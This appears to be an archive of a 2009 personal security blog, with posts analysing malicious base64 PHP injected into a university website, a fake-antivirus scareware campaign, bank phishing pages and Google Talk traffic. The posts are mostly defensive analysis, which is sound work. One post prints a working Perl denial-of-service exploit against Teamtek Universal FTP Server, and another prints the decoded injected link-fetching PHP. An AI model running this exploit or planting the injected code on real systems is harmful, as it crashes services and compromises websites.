Whe I reported the incident on OWASP, base64 encoded code was present on this page. Don't worry? The code is still present but on other pages. When I am writin this blog base64 encoded content was present at the following pages and many more
http://www.nagarjunauniversity.ac.in/administration.asp
http://www.nagarjunauniversity.ac.in/downloads.asp
Source code of either of the pages looks like
If you observe carefully we can see a site which is partially encoded (percentage encoding)
http%3A%2F%2Fbale.ws%2Fshow.php
Google's description had a mention about bale.ws domain.
When we open above site it gets redirected to
http://superpupermegacasino.com/which hosts *SmartDownload.exe*

Details of the EXE at Virustotal is shown as *Win32/CasOnline!Adware*. Further details about the binary can be found at
http://www.virustotal.com/analisis/9709a6f32be02642671f96ee264bae85fc924072ceb1a6f07c94ab94ae77943d-1254763534

Well, decoding the base64 content with base64_decode() method present within the malicious page gives the below script which is passed as an argument to eval(). eval executes the script

error_reporting(0);
$links = new GetLinks();

echo $links->Links;
class GetLinks
{
var $host = "esli.tw";
var $path = "/link.php?site=";
var $site = "";
var $user_agent = "";

var $Links = "";

var $_socket_timeout = 12;
var $_cashe_life_time = 3600;
var $_cashe_file = "cashe.txt";

function GetLinks()
{
if (!is_file($this->_cashe_file) || (filemtime($this->_cashe_file) < (time()-$this->_cashe_life_time)) || filesize($this->_cashe_file) == 0) {

$this->site = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $HTTP_SERVER_VARS['HTTP_HOST'];
$this->user_agent = $_SERVER['HTTP_USER_AGENT'];

$this->Links = $this->fetch_remote_file();
if ($handle = fopen($this->_cashe_file, 'w')) {
fwrite($handle, $this->Links);
}

fclose($handle);
}
else {
$this->Links = file_get_contents($this->_cashe_file);
}
}

function fetch_remote_file()
{
$buff = '';
$fp = fsockopen($this->host, 80, $errno, $errstr, $this->_socket_timeout);
if (!$fp) {

} else {
$out = "GET {$this->path}{$this->site} HTTP/1.1\r\n";
$out .= "Host: {$this->host}\r\n";
$out .= "Connection: Close\r\n\r\n";

fwrite($fp, $out);
while (!feof($fp)) {
$buff .= fgets($fp, 128);
}
fclose($fp);
$page = explode("\r\n\r\n", $buff);
return $page[1];
}
}
}

I am not sure what cashe.txt does and what are its contents!
The HTML Tag which is responsible for execution of scripts, malware etc is IFRAME.

Next blog will be most probably SmartDownload.exe binary analysis. Safe Surfing!!!

Personal Antivirus: antimalwarescanner8.com/ best-antivirus8.com/ hqvirusscanner.com/ advancedpcscanner3.com

2009-09-04T20:29:00.030+05:30

I typed my search keywords into Google and clicked on few links on the first page of results. One site interested me because it was redirecting me to some other site, the malicious web page whic is redirecting to new page was embedded with unnoticeable flash file named intro.swf. The web page on the redirected site welcomes us with a pop-up window saying "Warning!!!Your system.......". The pop-up warning window is similar across all malicious domains.

If we click OK or Cross(X)/Close button it will take us to fake scanning page depicting real Anti -virus scanning of the PC.
After the scanning it gives the scan results as shown in figure below depicting a real Anti-Virus scan stating various directories on the PC are infected with trojans.
Asks the users to download "Personal Antivirus" to protect their PC.
Clicking anywhere on this page will give a pop-up window to download Anti-virus binary.
If we click on the page for multiple times it will pop-up multiple windows for downloading
Antivirus-[a-f0-9]{3,7}_2031.exe file.If we do "View Source" on above page it will show few interesting javascript files.
Contents of listfile.js were interesting because it had an array of various file names with EXE, HLP, DLL etc extensions.
I downloaded different binary files samples but all the files had same MD5 value. Surprising !!!
Tried to execute the sample on VMware with MS Windows XP SP2 installed. It gives the following memory access error on VM. Is it detecting VM environment?!!
I executed the same sample on MS Windows Server 2003 Standard Edition with SP2 but not able to run the sample successfully.

Don't try to access domains with URI
http://maliciousdomain.com/1/?sess=p2T4yjjxMi01JmlwPTY3Ljk3LjgwLjUmdGltZT0xMjU1MUAMPQZM

sess parameter is changing with every malicious domain. I was littile suspicious with the sess parameters value for base64 encoding, decoding it to ASCII gives
§døÊ8ñ2-5&ip=67.97.80.5&time=12551@=L
Wow!! It contains an IP Address.

Malicious Domains: hqvirusscanner.com
antimalwarescanner8.com
advancedpcscanner3.com
best-antivirus8.com
antivirus-fast-scan04.com
(new domains might come up soon)
File Name: Antivirus_[a-z0-9]{3,7}.exe
Antivirus-[a-f0-9]{3,7}_2031.exe
File Size: 163840 bytes
MD5: 22fb04afad00ccaeda1f5e5892493d77
Malware Type: Browser Hijackers
Threat Level: High

File is Packed with unknown packer.
PEiD doesn't give any packer name.
OllyDBG throws exception while loading the file.
Imports few APIs from KERNEL32.DLL

Virustotal results can be found at
http://www.virustotal.com/analisis/6a761c86645ca3b8b808a80f330ffb315dc5c175089abf7f8ff9ea2ddbbc57b2-1252076765

If I successfully run the malicious file then I will post a new blog. Be cautious while surfing the net and when you come across pop-ups!!

Hello MicroSoft...Is SCRIPT Execution Really Safe?!!

2009-08-09T00:48:00.004+05:30

I was editing browser settings on IE7 to allow script/applet execution. After saving the configuration I accessed a site which has an applet. As expected browser gave an error message saying " Your security settings do not allow websites to use ActiveX controls installed on your computer. This page may not display correctly. Click here for options..."

But......observe pop-up window ............!!
Scripts are usually safe.......Micro$$$$oft feels that SCRIPT execution is safe!!!

Version details of my browser, IE7, are
Version: 7.0.5730.13
Product ID: 92319-600-1753032-45410
Update Versions: 0

For "Happy Browsing" use Firefox.

Shortcut "Open Command Prompt" here

2009-04-07T18:47:00.002+05:30

Very Useful Shortcut "Open Command Prompt here"

1. Open any Folder/directory (already existing on the machine) by couble clicking or press "Windows+E" keys simultaneously.
2. Go to Tools->Folder Options. When you click Folder Options, new window will pop-up.
3. Select File Types.
4. Go to (NONE) Folder found under"Registered file types:".
5. Select "(NONE) Folder"
6. Now press "Advanced" tab.
6. Press New tab.
Action:
Open Command Prompt here

Application used to perform action:
path_to_cmd.exe (e.g. C:\WINDOWS\system32\cmd.exe)

7. Press OK->OK->Close tabs.
After the completion of seven steps above if you click any directory you can see "Open Command Prompt" in the menu which is marked with Red rectangla in the diagram.

Now you can right click on any Folder/Directory on any Windows OS (I tested on Windows Server 2003 with SP2 and Windows XP with SP2) and open Command Prompt from that Directory path.

ZEBRA Protocol and BitTorrent !

2009-03-28T14:48:00.008+05:30

I was just checking my mails. Got bored, started Wireshark!!!

To my surprise I saw packets with Zebra Protocol over TCP port 27756.

I didn't understand which application is using this protocol. I googled for the same which said that Zebra is a routing protocol, I was not convinced with the result.

I further analyzed the Packet Capture and used netstat, Task Manager etc. from which I came to know that BitTorrent is using Zebra Protocol. One more thing to add, BitTorrent also uses "BitTorrent" Protocol for communication over TCP.

Further analysis of the PCAP and googling gave information like Zebra is a streaming protocol for P2P communication.

AXIS Bank Phishing2...Be Careful !

2009-02-11T20:29:00.007+05:30

Don't be surprised if you get a mail from AXIS bank (infact not from AXIS bank but from malicious user) saying "MPORTANT NOTICE: Update Your Axis Bank Ltd® Net Banking Details" (this is the subject). Notice the missing "I" for word IMPORTANT in the subject. Most people might end up reading reading "MPORTANT" as "IMPORTANT".
The mail looks like
Clicking "Update Your NetBanking Account" will redirect us to
http://axisaccountsummary.t35.com/axisbank.co.in/RetailSignOn.htm
which looks like

Write anything in "Login ID" and "Password" text boxes and Click "Submit" tab without selecting the radio buttons, this will redirect us to
http://axisaccountsummary.t35.com/axisbank.co.in/authenticate.php
The authenticate.php page looks like

On this page we find "Download","Click Here" hyperlinks, on clicking them will redirect to
https://www.axisbank.co.in/BankAway/(b5zbwu55bnaszw55d2iyuz55)/web/L001/retail/jsp/user/%5Cdownload%5Ciconnectform.pdf
https://www.axisbank.co.in/BankAway/(b5zbwu55bnaszw55d2iyuz55)/web/L001/retail/jsp/user/%5Cdownload%5Cicoftfform.pdf
respectively. Above URL's which point to the real website are using HTTPS request to get the resource and we can see the Phishing filter(Lock symbol) on down left but we get "The page cannot be found" error while downloading the PDF's.
Enter any arbitrary data into "ATM Card No.", "ATM Pin No.","Transaction Password" and click "Continue" tab which will redirect to
http://christkingdomorphanage.org/idbi2/accountsummary.php

I browsed to the Contact Us page (http://www.christkingdomorphanage.org/contactus.php) where the address is mentioned as
CHRIST KINGDOM ORPHANAGE HOME
UMUEZEALAKPA ALAENYI
OGWA, MBAITOLI LGA,
IMO STATE, NIGERIA
p: (+234) 8033738658
e: http://www.christkingdomorphanage.org/info@christkingdomorphanage.org
w: http://www.christkingdomorphanage.org/

Well, this might be the phishing mail originating from Nigeria, most probably.

Safe Surfing...Enjoy!!!

Teamtek Universal FTP Server 1.0.50 DoS (daemon crash/ hang)

2009-02-03T21:45:00.004+05:30

This is a working exploit for an old Vulnerability which was updated recently.

############################################################
#
# Teamtek Universal FTP Server 1.0.50 allows remote attackers to cause a denial of service (daemon crash or hang) via (1)
# multiple STOR (aka PUT) commands, or an MKD command followed by (2) a '*' argument, (3) a '|' argument,
# (4) spaces, or (5) a long string. NOTE: the provenance of this information is unknown; the details are obtained solely
# from third party information.
#
# References:
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-7235
# http://www.securityfocus.com/bid/21085
#
# Tested on Windows XP SP1 with
# Universal FTP Server 1.0.44

# Banner: UNIVERSAL FTP SERVER - by Daniele Pratelli - www.teamtek.net - www.5e5.net

# With "mkdir |" command application crashes with "Run-time error '52:' Bad file name or number"
# With "mkdir *" command application crashes with "Run-time error '76:' Path not found"
#
# To run this exploit on MS Windows replace "#!usr/bin/perl -w" with "#!Installation_path_for_perl -w"

# (say #!C:/Perl/bin/perl -w)

# This was strictly written for educational purpose. Use it at your own risk.
# Author will not bare any responsibility for any damages watsoever.
# Author: Praveen Darhanam
# Email: praveen[underscore]recker[at]sify.com

# Blog: http://darshanams.blogspot.com

# Date: 20th December, 2008

##########################################################
use Net::FTP;

$ftp_dos_mkd=Net::FTP->new("$ARGV[0]",Debug=>0) || die "Cannot connect to Host $ARGV[0]\n Usage: ]#perl script_name

vuln_target_ip r Host\n";

$ftp_dos_mkd -> login("anonymous","anonymous") || die "Could not Login...Retry";

print "Enter 1 to launch FTP DoS using using multiple STOR/PUT commands\n";

print "Enter 2 to launch FTP DoS using directory name as * with MKD command\n";
print "Enter 3 to launch FTP DoS using directory name as | with MKD command\n";

print "Enter 4 to launch FTP DoS using MKD command followed by spaces\n";
print "Enter 5 to launch FTP DoS using MKD command followed by long string\n";

$special_char=;
chomp($special_char);

if($special_char==1)
{
while(1)
{
$ftp_dos_mkd -> stor("abc.txt");
}
}
elsif($special_char==2)
{
$ftp_dos_mkd -> mkdir("*");
}
elsif($special_char==3)
{
$ftp_dos_mkd -> mkdir("|");
}
elsif($special_char==4)
{
my $buf1 = "\x20" x 100000;
$ftp_dos_mkd -> mkdir("$buf1");
}
elsif($special_char==5)
{
my $buf2 = "D" x 100000;
$ftp_dos_mkd -> mkdir("$buf2");
}
else
{
printf "Please enter correct number to launch exploit !!";
}

$ftp_dos_mkd->quit;

AXIS Bank Phishing1...Be Careful !

2009-01-22T19:32:00.016+05:30

I has been seeing these mails from long time. I never used to open such mails, instead delete the mails. This time thought of writing about the issue. Got a mail from "AXIS Bank" (fake) with Subject "AXIS Bank Security Service Notification (IMPORTANT)". When opened, the mail looks like

We can find the following URL in the mail

h ttps://www.axisbank.com/security/New 2FA Token=a cct

When we hover mouse over the URL we can see http://eyering.com/interaction/cache/update/axis.php

link below the page.

The page below is original AXIS BANK's login page

When we click the link in the mail it will redirect us to the URL http://iamthecompetition.com/subscription/axisbank.co.in/RetailSignOn.htm

and the page looks like

This is the phishing page used by attackers to collect user names and passwords.

If you click "Submit" tab below radio button's it'll reidrect to other page which asks for ATM Pin !!

Safe Surfing...Enjoy!!!

Deciphering Google Talk's Jabber Communication

2008-11-19T00:43:00.008+05:30

Google Talk communicates through HTTPS (TCP Port 443) and Jabber (TCP Port 5222) Protocols. Google talk initially communicates through HTTPS and switches to Jabber. When 5222 is blocked using firewall Google Talk works on port 443 (HTTPS). Suppose HTTPS, port 443 is blocked and port 5222 is allowed in this case Google Talk doesn't work.

When the communication is through TCP Port 5222 for Google Talk we can see Octal (OCT) pattern in the pay load. We can see Description and Hex pattern in the payload of HTTPS communication.

Below payload is seen in “Client Hello” packet which is sent after three way handshake on port 443 and three way handshake on port 5222 if both the ports are allowed. This is the mapping between Octal and Hex Patterns.

Oct/Jabber Hex/HTTPS Description

--------------- --------------- -------------------------------------

\200L 804c Length: 76
\001 01 Handshake Message Type: Client Hello (1)
\003\001 0301 Version: TLS 1.0 (0x0301)
\0003 0033 Cipher Spec Length: 51
\000\000 0000 Session ID Length: 0
\000\020 0010 Challenge Length: 16
\000\000\004 000004 Cipher Specs: TLS_RSA_WITH_RC4_128_MD5 (0x000004)
\000\000\005 000005 Cipher Specs: TLS_RSA_WITH_RC4_128_SHA (0x000005)
\000\000\n 00000a Cipher Specs: TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x00000a)
\001\000\200 010080 Cipher Specs: SSL2_RC4_128_WITH_MD5 (0x010080)
\a\000\300 0700c0 Cipher Specs: SSL2_ DES_192_ EDE3_CBC_WITH_MD5 (0x0700c0)

\003\000\200 030080 Cipher Specs: SSL2_RC2_CBC_128_CBC_WITH _MD5 (0x030080)
\000\000\t 000009 Cipher Specs: TLS_RSA_WITH_DES_CBC_SHA (0x000009)
\006\000@ 060040 Cipher Specs: SSL2_DES_64_CBC_WITH _MD5 (0x060040)
\000\000d 000064 Cipher Specs: TLS_RSA_WITH_RC4_128_MD5 (0x000064)
\000\000b 000062 Cipher Specs: TLS_RSA_ EXPORT1024_WITH_DES_CBC_SHA (0x000062)
\000\000\003 000003 Cipher Specs: TLS_RSA_EXPORT_WITH_RC4_40_MD5 (0x000003)
\000\000\006 000006 Cipher Specs: TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 (0x000006)
\002\000\200 020080 Cipher Specs: SSL2_RC4_128_ EXPORT40_WITH_MD5 (0x020080)
\004\000\200 040080 Cipher Specs: SSL2_RC2_CBC_128_CBC_WITH_MD5 (0x040080)
\000\000\023 000013 Cipher Specs: TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA (0x000013)
\000\000\022 000012 Cipher Specs: TLS_DHE_DSS_WITH_DES_CBC_SHA (0x000012)
\000\000c 000063 Cipher Specs: TLS_DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA (0x000063)
e72b7909ff36880aa266262537c83988 Challenge

Google Talk communication through gmail uses "User Agent: Google Talk\r\n" which can be seen through Ethereal/Wireshark capture.